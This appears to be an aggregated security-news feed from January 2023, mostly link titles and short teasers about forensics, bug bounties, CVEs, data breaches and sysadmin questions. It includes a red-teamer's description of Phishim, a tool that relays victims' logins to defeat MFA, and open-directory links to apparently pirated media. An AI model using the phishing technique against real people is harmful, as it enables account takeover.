    Hey all, I was wondering if anyone could recommend an E-Discovery tool. We are a small forensic shop and sometimes have to run a set of keywords for litigation related matters. The issue is that the forensic tools that we use often hit on everything e.g. if the keyword was “NDA”, our tools may hit on NDA in code such as an email header, code in files, etc. Ideally we would like a tool that would hit on NDA in the email body/subject and contents of files. Is there a tool out there that does this? I don’t believe we need all the bells and whistles because we don’t host the data, but give it to counsel or another E-Discovery vendor for more E-Discovery work e.g. bates numbering, load file etc. Ideally we’re looking for an E-Discovey tool that has more “accurate” results as far as running keywords through email and file data. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]
    Litigation E-Mail Tool for Collection / Analysis?
    I've been tasked with doing some initial discovery on around 40 email boxes that are split between Gmail and Microsoft 365 / Exchange. I'd like to get advice on a practical tool we can use to download and search the collection of mailboxes, allowing us to use keywords and constraints to find e-mail and then collect them into a PST or other repository for delivery to our lawyers. Any advice? submitted by /u/JABRONEYCA [link] [comments]
    SIFT Practice Cases
    Does anyone know of any resources for data that I can analyze with the SANS SIFT workstation? Can’t seem to find any intro cases with walk through for beginners. Thank you! submitted by /u/Terry-Hesticles [link] [comments]
  • Open

    SecWiki News 2023-01-06 Review
    Analysis and reflections on the US FY2023 cybersecurity budget by ourren. For more of the latest articles, visit SecWiki
  • Open

    If you’re a penetration tester, DO THIS NOW!
    Hi all this is something that I hope can resonate with everyone. Developing tools as a penetration tester will deepen your understanding… Continue reading on System Weakness »
    Privileges Escalation Techniques (Basic to Advanced) in Linux
    Part-3 Continue reading on System Weakness »
  • Open

    DevSecOps needs maximum code coverage
    Tracking code coverage is one very meaningful measure of the success of your DevSecOps initiatives. Continue reading on Medium »
    FuzzingWeekly CW 1:
    Fuzzing is Cool, Actually: https://simplythetest.tumblr.com/post/705635085370687489/fuzzing-is-cool-actually Continue reading on Medium »
  • Open

    FreeBuf X 极验 (GeeTest) | The 2022 Fake Traffic White Paper released
    In the post-pandemic era, as offline and online business in every industry becomes deeply integrated and transformed, traffic-centric thinking is shifting from growth orientation toward cost reduction and efficiency.
    The Ultimate Guide to California Privacy Law
    Introduces which privacy protection laws California has and what they require, then expands in detail on the CCPA's requirements and the differences between CCPA and CPRA.
    FreeBuf Morning Report | Developer tool CircleCI discloses a serious security flaw; predictions for new cyberattack trends in 2023
    Financial institutions (36%), government (14%), healthcare (9%) and education (8%) are among the industries most likely to be attacked.
    FreeBuf Weekly | Data on 200 million Twitter users made public; in 2023, is Qunar again using big data to overcharge repeat customers?
    Happy weekend, Buffers. Here is this week's FreeBuf Weekly.
    Gophish: a powerful open-source phishing test tool
    Gophish is a powerful open-source phishing simulation tool that helps administrators run security-awareness training for company employees.
    Potential threats from AI: hackers use ChatGPT to break into networks with ease
    AI chatbots are fun, but they are also risky, because they can give detailed advice about any vulnerability.
    France fines Apple 8 million euros; Apple says it will appeal!
    Apple was fined 8 million euros for collecting user data on the App Store without user consent in order to serve targeted ads.
    Top 10 global ransomware ransoms of 2022 | FreeBuf year in review
    Ransomware attacks were frequent in 2022; which of them produced the largest ransoms? Based on public reports and materials, this article ranks the ten largest ransom amounts of 2022.
  • Open

    Fuzzing Is Cool, – Fuzzing Weekly CW 1
    Article URL: https://ioc.exchange/@FuzzingWeekly/109641921261958698 Comments URL: https://news.ycombinator.com/item?id=34273391 Points: 1 # Comments: 0
  • Open

    GeoCities midi archive
    http://reasonstation.nl/downloads/midi/GeoCities-MIDI-ArchiveTeam/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Analysing Command Detected in Request Body
    No content preview
  • Open

    Links Update
    This week I added another tab and renamed my “Research Links” Google Sheet to “OSINT Links & Resources”. Continue reading on Medium »
    Maximizing the Value of Deep Dive Due Diligence, Background Checks, and HUMINT
    Deep dive due diligence, background checks, and HUMINT are valuable tools that help companies make informed decisions and protect their… Continue reading on Medium »
    We Can Make Your Total Life Private & Delete Your Entire Current Online Footprint
    The internet has become a haven for information, and the privacy of our personal data is at risk. The internet has been designed to be a… Continue reading on Medium »
    Ultimate OPSEC
    Don’t let Big Brother spy on you! Follow these all-powerful opsec rules to stay safe and secure Continue reading on Medium »
    Isn’t OSINT just glorified Googling?
    When I tell people what I do for a living, the usual reaction is: “Wait a minute, you mean you get paid to just Google stuff all day?!”… Continue reading on The First Digit »
  • Open

    Blind XSS in Email Field; 1000$ bounty
    Where there is blind-xss, There always is xsshunter! Continue reading on Medium »
    Race Condition Vulnerabilities
    Hello OutThere Continue reading on Medium »
    Debaub Gets $40K as Bug Bounty after Identifying Flaws on Uniswap
    Continue reading on Medium »
    I Reverse engineered an Amazon Prime Error
    I encountered DECYRPTION_FAILURE while watching Amazon prime videos, I attempt to reverse engineer the cause of this error here. Continue reading on Medium »
    XSS: What I have learned
    This is an ongoing post, constantly updated with new information that I have learned about XSS. Continue reading on Medium »
  • Open

    One of my servers seems to be trying to connect via RDP to an unknown server.
    I have a server, let's call it 10.1.1.1, that has flagged alerts on my Untangle firewall for trying to create RDP sessions to several other servers I don't recognize on the internet. The alert reads as Session TCP 10.1.1.1:53 -> 74.125.138.100:3389. I'm confused why the server is trying to connect outbound on an RDP port over a DNS port. In the alert it says it tried to connect 116 times. Untangle's support pages indicate it could be a brute force attempt, however the connection is going from inside to out so it's clearly not an attempt on my own system as far as I can tell. Any help you can give me is appreciated as I'm new to System Administration for a small company. I'll be glad to answer any specific questions I can about the situation if you have any. submitted by /u/HDPaladin [link] [comments]
    Changing from Opportunistic TLS to Forced TLS
    Has anyone implemented Forced TLS for all email rather than Opportunistic TLS? I'm exploring this option and was wondering how it went for others. submitted by /u/Javathemut [link] [comments]
    Would adding a DNS “A” record to CloudFlare hide my IP from Shodan?
    I have a VPS running WHM/cPanel. The domain attached to cPanel utilizes CloudFlare to conceal the server IP. On CloudFlare I have an “A” DNS record for the domain pointing to the VPS IP. Through a normal DNS or nameserver lookup, the VPS IP just comes up as CloudFlare IP addresses. If I use Shodan, it reveals the WHM host name (server1.exampledomain.com), which displays the raw VPS IP. Would creating an “A” DNS record for “server1” on CloudFlare hide the actual server IP from Shodan and other host name resolving tools? I’ve added the “A” DNS record to CloudFlare for server1.exampledomain.com, but I don’t think Shodan has updated yet. So I’m not sure if it actually worked. submitted by /u/GivingUp_RS [link] [comments]
    would this job listing at a multibillion dollar crypto company make you raise your eyebrows and wonder if the company posting it was recently hacked?
    Digital Currency Group (DCG), the most important and at one time one of the most valuable companies in the American cryptocurrency economy (and maybe the entire world's crypto economy), has been in a world of shit lately because of the collapse of Genesis Trading and Genesis Capital, one of the 3 jewels in its corporate crown (and also one of the only subsidiaries that actually made money - the others are Coinbase and Grayscale / GBTC), what with owing at last count somewhere between $2 to 4.5 billion to various parties, including $900 million owed to retail users of Gemini, the Winklevoss twins' startup, that it was refusing to pay. Here's the job posting. Also worth knowing that 69 people work at Grayscale and roughly 100 at parent company DCG. --------- Here's why that job posting is on…
    BIOS Patch Debate
    Recently having some debates with sysadmins on how important it is to patch the Dell BIOS vulnerabilities listed in DSA-2022-224 and DSA-2022-144. Any advice/feedback/examples of BIOS being abused that I can use to put this to rest? submitted by /u/TheReddHaze [link] [comments]
  • Open

    Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
    submitted by /u/numanturle [link] [comments]
    Unraveling the techniques of Mac ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    GitHub Actions Privilege Escalations - The "workflow_run" trigger
    submitted by /u/dotanoam [link] [comments]
    How to avoid DoS when using Rust’s popular Hyper package
    submitted by /u/SRMish3 [link] [comments]
    SpyNote: Spyware with RAT capabilities targeting Financial Institutions
    submitted by /u/YioUio [link] [comments]
    “MasquerAds” — Google’s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs…
    submitted by /u/SharonBlatt [link] [comments]
    pure Python implementation of MemoryModule technique to load a dll from memory without injection or shellcode
    submitted by /u/naksyn_ [link] [comments]
    Circle CI Compromised - Attackers Accessed Tokens & Other Sensitive Information
    submitted by /u/sanitybit [link] [comments]
    CarolinaCon 2023 CFP is accepting submissions here
    submitted by /u/blkmanta [link] [comments]
    Padding oracle attack: demonstration
    submitted by /u/yurichev [link] [comments]
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files.
    submitted by /u/CoolerVoid [link] [comments]
    YWallet Audit Results
    submitted by /u/Gallus [link] [comments]
    Prototype Pollution in Python
    submitted by /u/Gallus [link] [comments]
  • Open

    Turla: A Galaxy of Opportunity
    submitted by /u/dmchell [link] [comments]
    Windows Credential Vault - Accessing Passwords
    submitted by /u/Clement_Tino [link] [comments]
    Join us for the Ultimate Showdown: HELK vs Covenant on Twitch!
    I'm excited to invite you to join us on our Twitch stream tonight at 9PM EET, where we'll be putting HELK stack against Covenant beacons. The focus will be to see how to detect beacons and then is it possible to evade the HELK detection. This is going to be a thrilling showdown and we can't wait to see how these two tools measure up. So, see you on https://www.twitch.tv/lsecqt submitted by /u/lsecqt [link] [comments]
  • Open

    SecWiki News 2023-01-05 Review
    2022 GreyNoise report on mass exploitation in the wild by Avenger; Taming a certain "digital" antivirus to maintain privileges by ourren; Upgrading a practice-oriented basic security system by ourren; 2022 annual review of malicious PyPI packages by ourren; 2022 annual review of blockchain security and anti-money-laundering analysis by ourren; A comprehensive look at CORS (cross-origin resource sharing) vulnerabilities by 路人甲; Research on cybersecurity capability building in the US space domain by ourren. For more new articles, visit SecWiki.
  • Open

    Exploring exploitation methods for the Groovy component
    A summary of vulnerabilities in the Groovy component in Java
    SnakeYaml: from vulnerability detection to exploitation techniques
    A study of SnakeYaml exploitation techniques combined with third-party libraries and with the JDK itself
    Classified protection (等保) assessment items: weak passwords and empty passwords
    This article details the key assessment points and precautions for weak and empty passwords in classified protection (等保) assessments, for readers' reference only.
    FreeBuf 2023 annual event plan announced | membership system fully upgraded
    The long-awaited FreeBuf 2023 annual event plan is here; you've been waiting a long time, haven't you?
    cypherhound: a terminal application for BloodHound datasets
    cypherhound is a powerful terminal application, developed in Python 3, that includes 260+ Neo4j Cypher queries for BloodHound datasets.
    Notes on reverse analysis during a 2022 HVV exercise in a certain region
    Here's what happened: during an HVV exercise in a certain region shortly before National Day, we were notified by the client that they had received a phishing email and wanted to trace its source.
    FreeBuf Morning Report | Ukraine achieves network-centric warfare through a digital matrix; Microsoft considers adding ChatGPT to Bing
    Global news 1. Ukrainian forces achieve "network-centric warfare" through an improvised digital matrix. During the Russia-Ukraine war, the Ukrainian military improvised a network connecting drones, soldiers and weapons via satellite communications and custom software, giving the country's forces a degree of intelligence, coordination and accuracy that lets them outmaneuver Russia's large but sluggish army. [Read the original] 2. Facebook fined $414 million by Irish regulator for forcing users to accept targeted ads. The Irish Data Protection Commission (DPC) has fined Meta Platforms 3
    Injecting a fileless Tomcat memory shell via CC chains
    Sharing and learning: injecting a fileless Tomcat memory shell using CC chains!
    Joining forces for security: the second White Hat Summit hosted by Beike (Ke.com) concludes successfully
    On December 27, 2022, the "Beike Security TIME" second White Hat Summit and Beike SRC's third anniversary celebration were held online as scheduled.
    Another huge fine! Meta fined 390 million euros for violating EU data privacy rules
    Because Meta forced users to accept targeted personalized ads, violating the EU General Data Protection Regulation, the Irish Data Protection Commission issued Meta a hefty 390 million euro fine.
    Car brands including Mercedes-Benz and BMW have API vulnerabilities that could expose owners' personal information
    The API vulnerabilities allow hackers to carry out malicious activity such as remotely unlocking and starting vehicles, tracking vehicle location, and stealing owners' personal information.
    Data of 200 million Twitter users made public, downloadable for just $2
    A file containing data on 200 million Twitter users was posted on a popular hacking forum.
    Secure password management; OA login lockout policies and privileged account management solutions | FB enterprise-side group topic discussion
    How should passwords be managed securely? How should OA login lockout policies be defined? A discussion of privileged account security management.
  • Open

    Recipes
    https://www.cyber-kitchen.com/archive/ submitted by /u/Waste-Release-6235 [link] [comments]
    Category Download from Archive
    submitted by /u/manymarco [link] [comments]
    No-Intro romsets
    https://myrient.erista.me/files/No-Intro/ submitted by /u/Waste-Release-6235 [link] [comments]
    Is there a way to add filenames from a txt document
    I have a txt file which has file names and links which looks like this: https://imgur.com/a/o7IQnn5 I am able to download these links with wget but the filenames are very weird. Is there a way to download these links with the filenames above? If not, then maybe I can rename these files after downloading? I am not sure how to do this because there are about 100 videos here and it would take hours if I download and rename each link manually. submitted by /u/Idontknowwhattouse01 [link] [comments]
  • Open

    PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources
    We take a deep dive into Automated Libra, the cloud threat actor group behind the freejacking campaign PurpleUrchin. The post PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources appeared first on Unit 42.
  • Open

    ChatGPT: be my fuzz text expert
    I told ChatGPT to be my fuzzing assistant using the feedback based fuzzing tool CI Fuzz. Here is what it did. Continue reading on Medium »
  • Open

    Magnet Forensics Certification Tests - Anyone?
    Has anyone taken any of the Magnet Forensics Axiom Cyber certification tests? I’ve taken the AX200 class, but have not yet tackled the test. Not sure how the format is, can you use books, etc. If you’ve taken one, what do they compare to (SANS?). Thanks. submitted by /u/forensicfun327 [link] [comments]
  • Open

    CVE-2022-40127: RCE in Apache Airflow <2.4.0 bash example
    Internet Bug Bounty disclosed a bug submitted by leixiao: https://hackerone.com/reports/1776476 - Bounty: $4000

  • Open

    Escaping from bhyve
    submitted by /u/Gallus [link] [comments]
    Fun and Games with Intel AMT
    submitted by /u/lightgrains [link] [comments]
    In-depth Analysis of the PyTorch Dependency Confusion Administered Malware
    submitted by /u/gfdgfbal [link] [comments]
    a quick post about rbac-police
    TL;DR: it's awesome. Some pods can take over the entire Kubernetes cluster. Don't trust helm charts. It's super easy to audit yourself. It's not my tool. https://punksecurity.co.uk/blog/rbac-police/ submitted by /u/punksecurity_simon [link] [comments]
    CyberArk Labs’ 2022 Threat Research in Review
    submitted by /u/CyberArkLabs [link] [comments]
    PBS FRONTLINE investigates Pegasus, the powerful spyware sold to governments around the world by the Israeli company NSO Group.
    submitted by /u/identifytarget [link] [comments]
  • Open

    Can you become a pen tester if you’re autistic?
    Hi. I’m autistic and have ADHD, and I would like to know if I can become a pen tester. I struggle with making phone calls, socializing, being alone, organization and planning. What can I do to overcome these hurdles? And can I be successful as a pen tester if I overcome the hurdles? submitted by /u/AlternativeNo5023 [link] [comments]
    Do you use any cloud security posture solutions?
    Have AWS and Azure which will be expanding soon, trying to get a handle on AWS at the moment to make sure instances stay patched, CrowdStrike installed, no misconfigurations like open SSH to the world. Would be nice to find something to help with this, any suggestions? submitted by /u/internetquestions21 [link] [comments]
    Which Masters? Georgia Tech vs SANS vs Utica
    Cross-posted from r/Cybersecurity as I know this subreddit is more question oriented. I've shortlisted 3 different Master's to pursue. I'd like to hear opinions on these programs from anyone who has previously attended, professors/instructors, and anyone else who has done their own research on pursuing a masters themselves. Online MS in Cybersecurity at Georgia Tech Policy Track. Pros: 10k, 2 years, high ranking university, eligible for scholarship for Service(SFS), fully funded by my work, eligible for most grants and scholarships. Cons: not an NSA Center of Academic Excellence(CAE) program (a different degree is), Policy Track is not technical, but the technical track requires extremely good programming skills. SANS Institute MS in Cyber Security Engineering. Pros: World renowne…
    Got sent a photo/video snap from a stranger that turned into a link. Is it a virus/malware?
    A stranger added me on snapchat and sent me a snap. I can't remember if it was a video or photo, but it was one of them. After I tapped on the snap no video or photo showed and it turned into a link, like a mini-url. I wasn't brought to a website or anything, but I am thinking that by tapping on the snap it infected my phone with malware? Is this possible? Am I safe? For some reason I think that you wouldn't be able to get infected this way. submitted by /u/EnterShikariZzz [link] [comments]
    EDGECAST...Is it safe?
    I am sure a lot of you have seen connections from your comp to this IP range 72.21.80.0/3. Checking VirusTotal seems to tell me it's coming from Microsoft, but there are a lot of conflicting opinions on whether or not this is malicious. Based on the analysis, the only security vendor that flags it as malicious is the Comodo Valkyrie verdict, yet everything else checks out. It says it's a domain from Edgecast and is a secure server encrypted with SHA256. Is this server being abused in any way? Cause I have seen a handful of people complain about it, yet I can't make the call yet. Should I block this IP? submitted by /u/Playful-Net9746 [link] [comments]
    Burner to Home Wi-Fi
    Would connecting a burner laptop or phone to your personal home Wi-Fi while under VPN and Tails compromise the burner? submitted by /u/VizVincent [link] [comments]
    Fidelis Network feasible for ICS environments?
    Hi r/asknetsec, I am looking for experiences and professional insights on the usefulness of Fidelis Network in ICS environments. I already used the search function and just found this: https://www.reddit.com/r/AskNetsec/comments/3de2uw/fidelis The information that's publicly available on their website is as usual superficial marketing mumbo jumbo. However, I got the impression from it, that Fidelis Network is mostly targeted for use in enterprise and cloud environments. Any experiences or suggestions? submitted by /u/Goforhistory [link] [comments]
    How can you do PCI compliant 2FA for workstations that are in scope?
    How can one do 2FA for workstations that are in scope (both Windows and Mac) to be PCI compliant? So basically to require both a password upon startup plus a second factor of authentication to be able to log in. I looked at a Yubikey as a solution, but it doesn't seem to be PCI compliant; the PIN is only alphanumeric. Curious how other people do this? submitted by /u/apache99 [link] [comments]
  • Open

    ~20 Anime 1080p Seasons (fast seedbox)
    submitted by /u/mingaminga [link] [comments]
    A few classic movies on a seedbox. And all 5 seasons of "Rhoda" from 1978 (for some reason)
    submitted by /u/mingaminga [link] [comments]
    Full Seasons of ~20 TV Series on a fast seed box
    submitted by /u/mingaminga [link] [comments]
    How do I even into?
    This post is aimed at the newcomers to this sub. Those who’ve just discovered ODs (Open Directories). It covers most of the “How to” questions. MOST OF THIS INFORMATION IS ALREADY IN THE LINKS IN THE SIDEBAR OR IN THE STICKY AT THE TOP OF SUB’S FRONTPAGE. Please read them 1st before asking questions. None of us here are getting paid, certainly not to spoonfeed new users as they come along. How to download. There are probably as many ways to download as there are lengths of string in the sea (shitty mixed metaphor for ESL). If you go here and look at the “Softwares” section you’ll find a gud writeup of the majority of tools most of the users here use. My personal goto is: wget -rcv -np -nc “the url you want to download” If you are new to wget as well as the links in the sidebar there are a number of wizards that can take you thru the switches to use. How to search There are a few frontends to google which help if your google-dorks/fu isn’t so great Grasshopper. Again use the link I’ve already posted and look at the “search” subheadings. There are a couple of links in the sidebar that explain the process in a bit more detail. How to post Gotta be honest muh post about posting breddy much covers it. rubs lapels If there is something about posting that isn’t in there - let me know & I’ll amend it. I get that this is a pretty lazy post (all I’ve done is reposted links) but that’s the point - most of the answers to most of the how to questions are literally already there. Speaking for myself (having been here for a while): most of us are happy to help. But spoonfeeding the basics over & over & over & over again just gets tiresome. Even moreso when a few minutes of reading on the questioners part could save a lot of time & effort. Having said that: once you’ve rtfm’d I personally am always happy to answer more in-depth or technical questions. Thanks always to /u/ElectroXexual for their excellent post. submitted by /u/ringofyre [link] [comments]
  • Open

    Reducing your Online Footprint in 2023
    Introduction Continue reading on Medium »
    Fact Check & SOCMINT Investigation
    CALL FOR ASSISTANCE Continue reading on The Sleuth Sheet »
    Using Grep for Osint
    Time to dig through some juicy databases! We’ll be scouring them for all kinds of personal info like usernames, emails, IPs, and even DOBs… Continue reading on Medium »
    Telegram began to hide chat participants… what to do?
    Telegram has added an option to hide the list of chat participants (for chats with more than 100 users). Previously, this feature was only… Continue reading on Medium »
    The Sleeper Cell Writeup
    PROLOGUE Continue reading on The Sleuth Sheet »
    CyberDefenders L’espion writeup
    This is L’espion writeup Continue reading on Medium »
  • Open

    CVE-2022-23520: Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)
    Internet Bug Bounty disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1805893 - Bounty: $2400
    CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)
    Internet Bug Bounty disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1805899 - Bounty: $2400
    CSV Injection at https://assets-paris-demo.codefi.network/
    Consensys disclosed a bug submitted by doosec101: https://hackerone.com/reports/1748961 - Bounty: $500
  • Open

    DeFi auditor nets $40k for identifying Uniswap vulnerability
    Article URL: https://cointelegraph.com/news/defi-auditor-nets-40-000-for-identifying-uniswap-vulnerability Comments URL: https://news.ycombinator.com/item?id=34251127 Points: 3 # Comments: 0
    Critical Vulnerability in Uniswap
    Article URL: https://twitter.com/dedaub/status/1610058814094450694 Comments URL: https://news.ycombinator.com/item?id=34246128 Points: 1 # Comments: 0
  • Open

    GIAC GCFE
    Helpful tips/tricks for GCFE exam? Created an index and plan on taking practice exams. Nervous for the test submitted by /u/Starbiess17 [link] [comments]
  • Open

    Learning Web-Sec - Day 8 - Authentication Intro and Apprentice Labs
    A Basic Introduction to Authentication Vulnerabilities Continue reading on Medium »
    Bug Bounty Alert: Welcome Inverse Finance
    Today we welcome the first bug bounty of the year! Welcome home, Inverse Finance. We are thrilled to have them join us in our efforts… Continue reading on Medium »
    Moonbeam, Astar, And Acala Library Truncation Bugfix Review — $1m Payout
    Summary Continue reading on Immunefi »
    bWAPP HTML Injection — Stored
    "Stored", a type of HTML Injection, means stored or saved in English. This vulnerability, on a web page… Continue reading on Medium »
    Cross-site scripting in fairphone.com
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
    Bypass Premium Account Payment (GetPocket)
    Greetings Guys! 🤙 Today I bring you a Bug I found at the Beginning of the Year 2022 You know GetPocket Web Application, a popular for… Continue reading on Medium »
    P1 Bug Bounties: Subdomain Takeover Bug Hunting
    TL;DR- A guide to subdomain takeover, critical vulnerabilities associated with insecure protections, and its potential for critical bug… Continue reading on The Gray Area »
    bWAPP HTML Injection — Reflected
    What is HTML Injection? Continue reading on Medium »
  • Open

    SecWiki News 2023-01-04 Review
    Kaspersky in-depth report: reassessing cyber warfare in light of the Russia-Ukraine war by ourren. For more new articles, visit SecWiki.
  • Open

    The tech debt you need
    There’s good tech debt and bad tech debt in embedded systems and automotive software development. Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Beware of phishing using Flipper Zero; Qualcomm fixes multiple chipset security vulnerabilities
    Global news 1. Malaysian government orders investigation into data breach affecting 13 million citizens. Malaysia's Minister of Communications and Digital, Fahmi Fadzil, has ordered an investigation into an alleged large-scale data breach reportedly involving data from Maybank, Astro and the Election Commission. The alleged breach reportedly affected 13 million citizens. [Foreign press - read the original] 2. Google accuses India's antitrust regulator of copying parts of the EU ruling. In October 2022, India's antitrust regulator CCI fined Google $161 million for antitrust violations. Now,
    It's already 2023; is Qunar still using big data to overcharge loyal customers? Official response
    A netizen posted a video claiming that Qunar engages in big-data price discrimination: different users on different devices see completely different prices on Qunar.
    Top 100 global data breaches of 2022 | FreeBuf annual review
    This article lists the top 100 major global data breaches of 2022 in chronological order, in the hope of helping enterprises with data protection and security construction.
    After the NIO data leak, another established automaker leaks 200GB of user data
    With the rapid development of smart cars, vehicles' data-processing capabilities are growing, and the risks exposed by vehicle data security are becoming increasingly prominent.
    An automated attack technique targeting Microsoft Office
    If the victim machine has Microsoft Office installed, malware can use COM objects to carry out malicious attacks against the target host.
  • Open

    Reinforcement learning for red team automation
    submitted by /u/limmen [link] [comments]
    Phishim: Simple phishing with Puppeteer
    https://github.com/jackmichalak/phishim I wanted to share this phishing tool I built last year which I successfully used in a red team exercise. It spins up a Puppeteer browser on the server and then forwards screenshots down to the victim's browser and forwards interactions (clicks, key presses) up to the server. Since the victim performs the login themselves on the virtual browser, most types of MFA offer no additional protection. You can then access the virtual browser to use the login session the victim created. submitted by /u/jack_michalak [link] [comments]
  • Open

    Persistence || Backdoor Techniques (Beginner to Advanced) in Linux
    Part-1 Continue reading on Medium »
  • Open

    Patch diff an old vulnerability in Synology NAS
    Author: cq674350529. This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org. Preface: While browsing Synology's official security advisories, I came across a Critical-rated historical vulnerability, Synology-SA-18:64. According to the advisory, the vulnerability exists in Synology's DSM (DiskStation Manager) and allows a remote attacker to execute arbitrary code on affected devices...
  • Open

    Thoughts on Signal Labs vulnerability research course?
    Hi all, Long time lurker, first time poster. Does anybody have any strong thoughts on the Signal Labs vulnerability research course? I’ve got some education $$$ to burn and the course checks a lot of boxes for me: professional looking, self paced, deep dive on windows fuzzing. For reference I’m middling decent at reverse engineering and windows internals and bug hunting, and I’m looking to push forward my fuzzing & vuln research knowledge. As an aside I really appreciate the community around this sub and all the information regularly shared here. Y’all are great. Thanks jjh submitted by /u/offensivepolitics [link] [comments]

  • Open

    Filesystem Fuzzing with American Fuzzy Lop [pdf]
    Article URL: https://events.static.linuxfound.org/sites/events/files/slides/AFL%20filesystem%20fuzzing%2C%20Vault%202016_0.pdf Comments URL: https://news.ycombinator.com/item?id=34239068 Points: 2 # Comments: 0
  • Open

    A few classic pc games
    http://mc.tulli.com:25565/windows-archive/games/9x/kali-compatible/ submitted by /u/Waste-Release-6235 [link] [comments]
    how to download all the files in this link at one go.. please help guys
    submitted by /u/_G0DFATHER [link] [comments]
    sink and tap datasheets
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Hats Finance 2022 Recap
    2022 was an incredible year for Hats Finance! Despite the wild ride, we are thankful for every single person that contributed to our… Continue reading on Medium »
    Access to page with default credentials that require authenticate $$$.
    Hi guys! This is my second article about Bug Bounty Report writes up and I hope you will like it! Continue reading on Medium »
    FTP Access-with-anonymous-login-credentials-enabled.
    Hi guys! This is my first article about Bug Bounty Report writes up and I hope you will like it! I’m a bug hunter on hackerone and I… Continue reading on Medium »
    bWAPP: A Vulnerable Web Application for Practicing Vulnerabilities - Installation Guide
    How to Install bWAPP in Linux for Testing Vulnerabilities to start your Bug Bounty Hunting Continue reading on Medium »
    Vue JS Reflected XSS
    Hi guys, in this writeup I will be showing you how I was able to get a reflected XSS on a VueJS application. Continue reading on Medium »
    My hacking story: Its a Journey, not a destination
    Background Continue reading on Medium »
    Python script that will get a search term from the user and search for related articles on Medium…
    To use this script, you will need to install the requests library: Continue reading on Medium »
    simple Python script that can scan a URL for a Remote Code Execution (RCE) vulnerability.
    This script uses the requests module to send a POST request to the specified URL with a payload that contains code that can be used to… Continue reading on Medium »
    Simple python script which ask url and try to scan for file inclusion vulnerability.
    Continue reading on Medium »
    How to Get Into Bug Bounties?( Beginner’s guide)
    Hello Future Bug Bounty Hunters! Continue reading on Medium »
  • Open

    Why do ransomware hackers ask for payment in Bitcoin vs an anonymous currency like Monero?
    Ransomware typically encrypts a target's files and demands payment in Bitcoin in order to decrypt them. Bitcoin however is very traceable, in that the transaction history is public on the blockchain and shows exactly which addresses are receiving which amounts, and also which was sold to be converted to cash or a stable coin. Why don't hackers instead use a cryptocurrency whose purpose is specifically to obscure who is sending what amount to whom, so as to preserve privacy and avoid being caught by the authorities? Why stick to the proven traceable currency instead? submitted by /u/JamieOvechkin [link] [comments]
    problem with nexpose console
    Hi guys, I'm trying to use Nexpose but I have a problem that I can't solve... I give the terminal "systemctl start nexposeconsole" and through the link I access the console, which tells me to wait for the loading... but the loading does not even start, and shortly after my PC is no longer even listening on port 3780 and the browser rightly tells me "Unable to connect"... I state that the other times I used Nexpose it worked without problems... can you help me please? submitted by /u/metal_carter [link] [comments]
    Performing a phishing campaign.
    Hello, it's my first time I'll need to perform phishing. And I'm asking for any resources, books or methodologies on how to conduct that kind of test. I've watched Graham Helton's guide, which was very informative and gave me an idea about the process and the tools like gophish and evilginx2. I'll do the OSINT and research all the employees, this won't be the hard part, but the thing I'm not aware of is the part with the DNS and the Mail Server. The guy uses Mailgun to send emails; what are your thoughts about that? The other part I can't understand is that in every tutorial or article I see, the testers purchase a domain which is similar to the victim's domain, but my company won't do it. Is there any possible way to just reuse an existing domain and somehow manipulate it to look like theirs, or what are my options? Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    "Old d0g: new tricks?" - asking the community for some guidance on suggested learning as an experienced engineer to change my life.
    Hello, I'm a recovering electrotechnical engineer (masters in telecommunications major) that has morphed into a software engineer in the midst of my career, now circa 12 years. All my life I've loved tinkering with machines and trying to understand how stuff works and of course as a kid I was attracted to solving crackmes, learning assembly thru ORC tutorials, participating in CTFs, etc.. etc... that somehow was always what I liked. Somehow at some point of my life, while working but still being engaged into doing CTF's on VulnHub, or other sources finding HTB a couple of years ago kind of rekindled the spark. I started doing a lot of boxes, paying both HTB and ThM subscriptions, trying to learn and write and I almost felt again the love I had for these topics as a kid or adolescent. Nee…
    Saving Master password on Google Drive
    I use a password manager and just wondering if it is ok to save my master password on Google drive! If not, what is the best way to securely store it? submitted by /u/SmoothStatistician8 [link] [comments]
  • Open

    How to use nmap
    Nmap (Network Mapper) is a free and open-source network scanner tool that is used to discover hosts and services on a computer network by… Continue reading on Medium »
  • Open

    WebSniffer 2023 New Year Resolutions: Upgrades, API Support, and More
    WebSniffer has released its new year resolutions for 2023, which include upgrading the web interface, upgrading to a modern web platform… Continue reading on WebSniffer »
    Lampyre Q4 2022 updates
    We haven’t been here for a while, and there’s a reason for that: we’ve… Continue reading on Medium »
  • Open

    Nuclear Pond: Scanning for Vulnerabilities at Scale for Less Than a Cup of Coffee
    submitted by /u/crustysecurity [link] [comments]
    of-CORS: a framework for hacking internal apps with open CORS via bug bounty
    submitted by /u/wifihack [link] [comments]
    SSRF vulnerabilities caused by SNI proxy misconfigurations
submitted by /u/Gallus
    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More
submitted by /u/samwcurry

    SecWiki News 2023-01-03 Review
SecWiki Weekly (Issue 461) by ourren. For more of the latest articles, visit SecWiki.

    My 2022 APFS Advent Challenge series is complete
submitted by /u/jtsylve
    GCFA - NTFS $MFT additional study materials?
submitted by /u/hanna-barbarian

    Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463
submitted by /u/surrealisticpillow12
    Survey of security mitigations and architectures, December 2022
submitted by /u/surrealisticpillow12

    US Data Protection Requirements
    The United States has no unified regulatory law in the field of data security or privacy.
